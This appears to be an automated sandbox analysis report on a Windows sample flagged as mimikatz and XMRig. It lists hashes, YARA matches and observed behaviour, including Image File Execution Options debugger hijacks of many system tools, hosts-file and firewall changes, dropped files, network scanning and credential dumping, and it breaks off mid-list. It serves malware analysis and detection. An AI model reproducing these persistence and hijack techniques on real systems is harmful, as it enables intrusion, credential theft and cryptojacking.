Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
07-10-2024 10:35
Behavioral task
behavioral1
Sample
2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe
-
Size
16.0MB
-
MD5
7c6d4664093373246992db9c55c78231
-
SHA1
ae797e5117f0fc2daeba431341e21337dedf07b1
-
SHA256
d83f6fcead34e97e7014374dd4a3ea2e0a1a6b5d0e7db8082602b9016287ea84
-
SHA512
fc496492886b7dfb6dd0e3383d79ba17560431fe3f0bd48686523513ae9705285c6ae912c810b76aad0a54e32aca26543297a0a384055e62196db69d94cbcb1d
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYPHlTPemknGzwHdOgEPHd9BYX/nivPl/:a3jz0E52/iv1E3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4740 created 1636 4740 pgigett.exe 37 -
Contacts a large (20144) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/5072-177-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp xmrig behavioral2/memory/5072-182-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp xmrig behavioral2/memory/5072-199-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp xmrig behavioral2/memory/5072-212-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp xmrig behavioral2/memory/5072-218-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp xmrig behavioral2/memory/5072-232-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp xmrig behavioral2/memory/5072-248-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp xmrig behavioral2/memory/5072-255-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp xmrig behavioral2/memory/5072-264-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp xmrig behavioral2/memory/5072-373-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3984-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3984-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x00070000000234ee-6.dat mimikatz behavioral2/memory/3684-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/332-138-0x00007FF673D30000-0x00007FF673E1E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts pgigett.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts pgigett.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe pgigett.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pgigett.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe pgigett.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2660 netsh.exe 2372 netsh.exe -
Executes dropped EXE 27 IoCs
pid Process 3684 pgigett.exe 4740 pgigett.exe 4008 wpcap.exe 5084 iticjtthr.exe 332 vfshost.exe 4532 hkttbitjb.exe 4452 xohudmc.exe 4272 ascsso.exe 5072 pgtieb.exe 1788 hkttbitjb.exe 4340 hkttbitjb.exe 3012 hkttbitjb.exe 964 hkttbitjb.exe 4784 hkttbitjb.exe 780 hkttbitjb.exe 1588 hkttbitjb.exe 2384 hkttbitjb.exe 2020 hkttbitjb.exe 3520 hkttbitjb.exe 1836 hkttbitjb.exe 3412 hkttbitjb.exe 1532 hkttbitjb.exe 4780 hkttbitjb.exe 2664 hkttbitjb.exe 4264 hkttbitjb.exe 2136 pgigett.exe 2948 byhhrrpfb.exe -
Loads dropped DLL 12 IoCs
pid Process 4008 wpcap.exe 4008 wpcap.exe 4008 wpcap.exe 4008 wpcap.exe 4008 wpcap.exe 4008 wpcap.exe 4008 wpcap.exe 4008 wpcap.exe 4008 wpcap.exe 5084 iticjtthr.exe 5084 iticjtthr.exe 5084 iticjtthr.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 77 ifconfig.me 76 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\ascsso.exe xohudmc.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft pgigett.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache pgigett.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF pgigett.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE pgigett.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies pgigett.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content pgigett.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF pgigett.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 pgigett.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\ascsso.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 pgigett.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData pgigett.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 pgigett.exe -
resource yara_rule behavioral2/files/0x0007000000023543-134.dat upx behavioral2/memory/332-136-0x00007FF673D30000-0x00007FF673E1E000-memory.dmp upx behavioral2/memory/332-138-0x00007FF673D30000-0x00007FF673E1E000-memory.dmp upx behavioral2/files/0x000700000002354e-141.dat upx behavioral2/memory/4532-142-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/4532-146-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/files/0x000700000002354b-163.dat upx behavioral2/memory/5072-164-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp upx behavioral2/memory/1788-171-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/4340-175-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/5072-177-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp upx behavioral2/memory/3012-180-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/5072-182-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp upx behavioral2/memory/964-185-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/4784-189-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/780-193-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/1588-197-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/5072-199-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp upx behavioral2/memory/2384-202-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/2020-206-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/3520-210-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/5072-212-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp upx behavioral2/memory/1836-215-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/5072-218-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp upx behavioral2/memory/3412-220-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/1532-224-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/4780-228-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/2664-231-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/5072-232-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp upx behavioral2/memory/4264-234-0x00007FF6E3AB0000-0x00007FF6E3B0B000-memory.dmp upx behavioral2/memory/5072-248-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp upx behavioral2/memory/5072-255-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp upx behavioral2/memory/5072-264-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp upx behavioral2/memory/5072-373-0x00007FF69E1B0000-0x00007FF69E2D0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File opened for modification C:\Windows\atrbieur\svschost.xml pgigett.exe File opened for modification C:\Windows\cerspitiz\mbirvrilt\Result.txt byhhrrpfb.exe File created C:\Windows\cerspitiz\mbirvrilt\wpcap.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\libeay32.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\vimpcsvc.exe pgigett.exe File opened for modification C:\Windows\atrbieur\schoedcl.xml pgigett.exe File opened for modification C:\Windows\atrbieur\docmicfg.xml pgigett.exe File created C:\Windows\cerspitiz\mbirvrilt\byhhrrpfb.exe pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\crli-0.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\trch-1.dll pgigett.exe File created C:\Windows\cerspitiz\mbirvrilt\scan.bat pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\vimpcsvc.xml pgigett.exe File created C:\Windows\atrbieur\docmicfg.xml pgigett.exe File opened for modification C:\Windows\atrbieur\spoolsrv.xml pgigett.exe File created C:\Windows\cerspitiz\Corporate\vfshost.exe pgigett.exe File created C:\Windows\cerspitiz\mbirvrilt\wpcap.exe pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\ssleay32.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\xdvl-0.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\zlib1.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\Shellcode.ini pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\exma-1.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\trfo-2.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\schoedcl.exe pgigett.exe File opened for modification C:\Windows\atrbieur\pgigett.exe 2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe File created C:\Windows\cerspitiz\UnattendGC\specials\coli-0.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\svschost.xml pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\schoedcl.xml pgigett.exe File created C:\Windows\cerspitiz\mbirvrilt\ip.txt pgigett.exe File created C:\Windows\cerspitiz\mbirvrilt\Packet.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\libxml2.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\tucl-1.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\schoedcl.xml pgigett.exe File opened for modification C:\Windows\atrbieur\vimpcsvc.xml pgigett.exe File created C:\Windows\atrbieur\pgigett.exe 2024-10-07_7c6d4664093373246992db9c55c78231_hacktools_icedid_mimikatz.exe File created C:\Windows\cerspitiz\UnattendGC\specials\cnli-1.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\svschost.exe pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\spoolsrv.exe pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\docmicfg.exe pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\spoolsrv.xml pgigett.exe File created C:\Windows\atrbieur\spoolsrv.xml pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\posh-0.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\tibe-2.dll pgigett.exe File created C:\Windows\atrbieur\svschost.xml pgigett.exe File created C:\Windows\cerspitiz\Corporate\mimilib.dll pgigett.exe File created C:\Windows\cerspitiz\upbdrjv\swrpwe.exe pgigett.exe File created C:\Windows\cerspitiz\mbirvrilt\iticjtthr.exe pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\vimpcsvc.xml pgigett.exe File created C:\Windows\ime\pgigett.exe pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\docmicfg.xml pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\AppCapture64.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\AppCapture32.dll pgigett.exe File opened for modification C:\Windows\cerspitiz\mbirvrilt\Packet.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\ucl.dll pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\spoolsrv.xml pgigett.exe File created C:\Windows\atrbieur\vimpcsvc.xml pgigett.exe File created C:\Windows\atrbieur\schoedcl.xml pgigett.exe File opened for modification C:\Windows\cerspitiz\Corporate\log.txt cmd.exe File created C:\Windows\cerspitiz\UnattendGC\svschost.xml pgigett.exe File created C:\Windows\cerspitiz\UnattendGC\specials\docmicfg.xml pgigett.exe File created C:\Windows\cerspitiz\Corporate\mimidrv.sys pgigett.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3740 sc.exe 2212 sc.exe 3632 sc.exe 3036 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pgigett.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened 